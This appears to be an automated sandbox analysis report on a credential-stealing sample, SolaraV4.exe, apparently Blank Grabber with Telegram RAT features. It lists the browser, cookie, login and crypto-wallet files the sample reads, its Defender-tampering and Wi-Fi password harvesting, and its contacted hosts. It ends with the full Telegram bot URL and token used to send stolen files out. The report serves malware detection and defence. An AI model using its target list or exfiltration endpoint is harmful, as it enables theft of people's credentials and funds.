Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache\index-dir Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\2a4244a9-6ddb-4fcf-8518-af8544f13140 Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\protections.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\ls-archive.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SolaraV4.exe PID: 4300, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Blank Grabber
Source: Yara match File source: 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.2470820627.000002125C3B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.2470820627.000002125C3B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2975881407.0000024133496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2965972242.0000024133565000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SolaraV4.exe PID: 7112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SolaraV4.exe PID: 4300, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI71122\rarreg.key, type: DROPPED
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: SolaraV4.exe PID: 4300, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E62B5D bind,WSAGetLastError, 3_2_00007FFE75E62B5D
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525823 Sample: SolaraV4.exe Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 72 api.telegram.org 2->72 74 ip-api.com 2->74 76 blank-kf3va.in 2->76 84 Suricata IDS alerts for network traffic 2->84 86 Sigma detected: Capture Wi-Fi password 2->86 88 Multi AV Scanner detection for submitted file 2->88 92 13 other signatures 2->92 11 SolaraV4.exe 22 2->11         started        15 svchost.exe 2->15         started        signatures3 90 Uses the Telegram API (likely for C&C communication) 72->90 process4 dnsIp5 64 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->64 dropped 66 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->66 dropped 68 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->68 dropped 70 16 other files (none is malicious) 11->70 dropped 118 Self deletion via cmd or bat file 11->118 120 Modifies Windows Defender protection settings 11->120 122 Adds a directory exclusion to Windows Defender 11->122 124 3 other signatures 11->124 18 SolaraV4.exe 1 90 11->18         started        82 127.0.0.1 unknown unknown 15->82 file6 signatures7 process8 dnsIp9 78 ip-api.com 208.95.112.1, 49715, 49727, 80 TUT-ASUS United States 18->78 80 api.telegram.org 149.154.167.220, 443, 49728 TELEGRAMRU United Kingdom 18->80 94 Found many strings related to Crypto-Wallets (likely being stolen) 18->94 96 Uses cmd line tools excessively to alter registry or file data 18->96 98 Self deletion via cmd or bat file 18->98 100 8 other signatures 18->100 22 cmd.exe 1 18->22         started        25 cmd.exe 1 18->25         started        27 cmd.exe 18->27         started        29 38 other processes 18->29 signatures10 process11 signatures12 102 Suspicious powershell command line found 22->102 104 Uses cmd line tools excessively to alter registry or file data 22->104 106 Encrypted powershell cmdline option found 22->106 116 3 other signatures 22->116 31 powershell.exe 23 22->31         started        34 conhost.exe 22->34         started        108 Modifies Windows Defender protection settings 25->108 110 Removes signatures from Windows Defender 25->110 36 powershell.exe 23 25->36         started        46 2 other processes 25->46 38 tree.com 27->38         started        40 conhost.exe 27->40         started        112 Adds a directory exclusion to Windows Defender 29->112 114 Tries to harvest and steal WLAN passwords 29->114 42 getmac.exe 29->42         started        44 powershell.exe 29->44         started        48 71 other processes 29->48 process13 file14 126 Loading BitLocker PowerShell Module 31->126 128 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 38->128 130 Writes or reads registry keys via WMI 38->130 51 WmiPrvSE.exe 38->51         started        58 C:\Users\user\AppData\...\myx0gned.cmdline, Unicode 48->58 dropped 60 C:\Users\user\AppData\Local\Temp\6zHpy.zip, RAR 48->60 dropped 53 csc.exe 48->53         started        signatures15 process16 file17 62 C:\Users\user\AppData\Local\...\myx0gned.dll, PE32 53->62 dropped 56 cvtres.exe 53->56         started        process18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS true
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
ip-api.com 208.95.112.1 true
api.telegram.org 149.154.167.220 true
blank-kf3va.in unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot7576687091:AAHc9LHp1oJNmPES1PMfu8JQQ9jVtHibTlc/sendDocument true